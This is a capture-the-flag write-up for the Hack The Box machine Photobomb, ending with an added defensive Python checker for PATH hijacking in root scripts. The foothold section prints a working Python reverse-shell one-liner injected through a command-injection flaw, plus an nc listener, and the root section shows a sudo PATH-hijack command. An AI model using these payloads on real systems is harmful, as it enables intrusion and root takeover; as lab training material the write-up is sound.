Hello, in this writeup I explain the solution to the Photobomb Hack The Box machine.
USER
sudo nmap -sV -A 10.10.11.182
Check Port 80
Click the “Click here!” link
The credentials are in the JS file:
pH0t0:b0Mb!
Let's download a photo and intercept the request
Try command injection
That’s working. Let's get a reverse shell
python3+-c+'import+socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.28",3131));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
nc -lvp 3131
ROOT
Check sudo -l
View the contents of /opt/cleanup.sh
I guess I can execute commands as root using find. (exp machine: link)
First of all, I create a “find” file and set the execute permission
Add the path and run:
sudo PATH=$PWD:$PATH /opt/cleanup.sh
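
An added defensive check, not part of the original writeup: the root step relies on the script calling find by bare name while sudo accepts a caller-supplied PATH. The hypothetical helper bare_commands below flags such calls in a script that runs as root; the sample script is constructed and is not the machine's /opt/cleanup.sh.

```python
import re
import shlex

# Words bash resolves itself, with no PATH lookup (a partial list).
BUILTINS = {"[", "[[", ":", ".", "cd", "echo", "exit", "export", "printf",
            "read", "return", "set", "source", "test", "umask", "unset",
            "for", "case", "esac", "fi", "done", "}"}
# Words after which the next word is still in command position.
PREFIXES = {"if", "then", "elif", "else", "while", "until", "do", "!", "{",
            "exec", "command", "time"}
ASSIGNMENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*=")


def bare_commands(script_text):
    """Return (line_number, word) for each command run by bare name.

    Line-by-line heuristic: heredocs, multi-line quotes and commands
    passed as arguments (find -exec, xargs) are not analysed.
    """
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
        lexer.whitespace_split = True
        try:
            tokens = list(lexer)
        except ValueError:      # unbalanced quote: string spans lines
            continue
        at_command = True
        for tok in tokens:
            if tok and set(tok) <= set(";|&()"):
                at_command = True       # ; | && || ( ) start a new command
            elif at_command and not (tok in PREFIXES or ASSIGNMENT.match(tok)):
                at_command = False
                # A word containing "/" is run as a path, never via PATH.
                if "/" not in tok and tok not in BUILTINS:
                    findings.append((lineno, tok))
    return findings


# Constructed sample, not the machine's /opt/cleanup.sh.
SAMPLE = """#!/bin/bash
cd /var/app/log
if [ -s app.log ]; then
  /bin/cat app.log > app.log.old
  /usr/bin/truncate -s0 app.log
fi
find /var/app/uploads -name '*.jpg' -mtime +30 -delete
"""
HARDENED = SAMPLE.replace("\nfind ", "\n/usr/bin/find ")
```

Calling every binary by absolute path in the script, and not granting SETENV on the sudo rule, each close this path.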